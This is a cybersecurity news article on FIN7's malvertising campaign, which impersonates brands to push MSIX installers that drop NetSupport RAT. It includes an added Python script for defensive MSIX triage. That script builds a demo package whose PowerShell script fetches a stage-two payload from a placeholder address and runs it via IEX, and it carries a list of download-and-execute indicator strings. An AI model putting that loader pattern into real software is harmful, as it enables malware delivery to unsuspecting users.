Cyber security news for all


    FIN7 Hacker Group Exploits Malicious Google Ads to Distribute NetSupport RAT

    The financially motivated threat group known as FIN7 has been observed using deceptive Google ads, impersonating legitimate brands, to deliver MSIX installers that ultimately deploy the NetSupport RAT.

    According to a report by cybersecurity firm eSentire, the threat actors have created malicious websites mimicking well-known brands like AnyDesk, WinSCP, BlackRock, Asana, Concur, The Wall Street Journal, Workable, and Google Meet.

    FIN7, also known as Carbon Spider and Sangria Tempest, has been active since 2013, initially focusing on stealing payment data from point-of-sale (PoS) devices before shifting to targeting large firms through ransomware campaigns.

    The group has evolved its tactics over the years, using various custom malware families such as BIRDWATCH, Carbanak, DICELOADER (also known as Lizar and Tirion), POWERPLANT, POWERTRASH, and TERMITE.

    While FIN7 traditionally relied on spear-phishing, it has more recently turned to malvertising. Microsoft noted this in December 2023, when it observed the group using Google ads to distribute malicious MSIX application packages that executed the POWERTRASH dropper and then deployed NetSupport RAT and Gracewire.

    Microsoft's response to the abuse of MSIX as a malware distribution method was to disable the ms-appinstaller protocol handler by default, so that a web page can no longer trigger an MSIX install directly through an ms-appinstaller: link.

    In April 2024, eSentire observed FIN7's malicious ads prompting visitors to download a fake browser extension, which is actually an MSIX file containing a PowerShell script. That script gathers system information and contacts a remote server to fetch another, encoded PowerShell script, which in turn downloads and executes the NetSupport RAT.
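    The MSIX in that chain is only a ZIP archive, so the first triage step can be done statically without running the package. The Python script below is an added example, not code from the article or from eSentire: it opens a package, reads AppxManifest.xml for the identity and entry executable, checks whether a signature blob is present, and looks for the Package Support Framework (PSF) config.json startScript hook and any bundled .ps1 files that fetch and run a second stage. The sample package it analyses is constructed in memory; the indicator strings, the package name, and the 192.0.2.10 address are assumptions for the demo, and the article does not state which launch mechanism FIN7's packages used to run their script.

```python
"""Static triage of an MSIX package for PowerShell executed at launch.

Added example (not from the article, eSentire or Microsoft tooling).
An MSIX is a ZIP archive: AppxManifest.xml names the package and its
entry executable, AppxSignature.p7x holds the Authenticode blob, and a
PSF-packaged app carries config.json whose startScript runs a .ps1 file
before the real executable starts. The sample package is built in memory.
"""
import io
import json
import zipfile
import xml.etree.ElementTree as ET

APPX_NS = "{http://schemas.microsoft.com/appx/manifest/foundation/windows10}"

# Assumed indicator list for this demo, not a published signature: strings a
# first-launch script rarely needs unless it is fetching and running stage 2.
SCRIPT_INDICATORS = (
    "Invoke-WebRequest", "DownloadString", "DownloadFile", "Net.WebClient",
    "Invoke-Expression", "IEX", "-EncodedCommand", "FromBase64String",
)


def parse_manifest(xml_bytes: bytes) -> dict:
    """Pull identity and entry executables out of AppxManifest.xml."""
    root = ET.fromstring(xml_bytes)
    ident = root.find(APPX_NS + "Identity")
    apps = root.findall(APPX_NS + "Applications/" + APPX_NS + "Application")
    return {
        "name": ident.get("Name") if ident is not None else None,
        "publisher": ident.get("Publisher") if ident is not None else None,
        "executables": [a.get("Executable") for a in apps if a.get("Executable")],
    }


def triage_msix(data: bytes) -> dict:
    """Return identity, signing state, script hooks and findings for one package."""
    findings, start_scripts = [], []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        by_lower = {n.lower(): n for n in names}
        identity = {"name": None, "publisher": None, "executables": []}
        if "appxmanifest.xml" in by_lower:
            identity = parse_manifest(z.read(by_lower["appxmanifest.xml"]))
        else:
            findings.append("no AppxManifest.xml (not a valid MSIX?)")
        signed = "appxsignature.p7x" in by_lower  # presence only; not validated here
        ps1_files = [n for n in names if n.lower().endswith(".ps1")]
        for exe in identity["executables"]:
            if "psflauncher" in exe.lower():
                findings.append(f"entry point is the PSF launcher: {exe}")
        if "config.json" in by_lower:
            cfg = json.loads(z.read(by_lower["config.json"]))
            for app in cfg.get("applications", []):
                for key in ("startScript", "endScript"):
                    script = app.get(key) or {}
                    if script.get("scriptPath"):
                        start_scripts.append(script["scriptPath"])
                        findings.append(f"PSF {key} runs {script['scriptPath']} "
                                        f"with '{script.get('scriptExecutionMode', '')}'")
        for ps1 in ps1_files:
            text = z.read(ps1).decode("utf-8", errors="replace").lower()
            hits = [i for i in SCRIPT_INDICATORS if i.lower() in text]
            if hits:
                findings.append(f"{ps1} contains download/execute indicators: {hits}")
    return {
        "identity": identity,
        "signed": signed,
        "ps1_files": ps1_files,
        "psf_start_scripts": start_scripts,
        "findings": findings,
        "suspicious": bool(start_scripts) or any("indicators" in f for f in findings),
    }


def build_sample_msix(with_launch_script: bool = True) -> bytes:
    """Constructed demo package; every name, script line and address is made up."""
    exe = "PsfLauncher64.exe" if with_launch_script else "app.exe"
    manifest = f"""<?xml version="1.0" encoding="utf-8"?>
<Package xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10">
  <Identity Name="Example.BrowserExtension" Publisher="CN=Example Signer" Version="1.0.0.0"/>
  <Applications>
    <Application Id="App" Executable="{exe}" EntryPoint="Windows.FullTrustApplication"/>
  </Applications>
</Package>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AppxManifest.xml", manifest)
        z.writestr("AppxSignature.p7x", b"\x00placeholder signature blob")
        if with_launch_script:
            z.writestr("config.json", json.dumps({"applications": [{
                "id": "App", "executable": "app.exe",
                "startScript": {"scriptPath": "installer.ps1",
                                "scriptExecutionMode": "-ExecutionPolicy Bypass",
                                "waitForScriptToFinish": True}}]}))
            z.writestr("installer.ps1",
                       "$info = Get-ComputerInfo | Select-Object CsName, OsName\n"
                       "$s2 = Invoke-WebRequest -Uri 'http://192.0.2.10/stage2' -UseBasicParsing\n"
                       "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s2.Content)))\n")
    return buf.getvalue()


if __name__ == "__main__":
    for label, pkg in (("demo-malicious", build_sample_msix(True)),
                       ("demo-benign", build_sample_msix(False))):
        r = triage_msix(pkg)
        print(label, r["identity"]["name"], "signed" if r["signed"] else "unsigned",
              "SUSPICIOUS" if r["suspicious"] else "clean")
        for f in r["findings"]:
            print("  -", f)
```

    Run it against a real package with `triage_msix(open("pkg.msix", "rb").read())`. Note that the script only reports whether AppxSignature.p7x exists; a valid signature is exactly what lets these packages past SmartScreen, so signing state should inform the publisher check, not the verdict.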

    Additionally, eSentire found that FIN7 used the NetSupport RAT to deliver further malware, including DICELOADER via a Python script.

    FIN7's use of trusted brand names and deceptive web ads to distribute malware underscores the ongoing threat, particularly its abuse of signed MSIX files, whose valid signatures help the packages get past security mechanisms such as Microsoft Defender SmartScreen.

    Similar findings were reported by Malwarebytes, which observed malicious ads mimicking brands such as Asana, BlackRock, CNN, Google Meet, SAP, and The Wall Street Journal, targeting corporate users.

    This revelation coincides with a SocGholish (aka FakeUpdates) infection wave targeting business partners, indicating a broader interest in exploiting business relationships.

    Furthermore, there has been a separate malware campaign targeting Windows and Microsoft Office users, spreading RATs and cryptocurrency miners through cracks for popular software, as reported by Symantec.
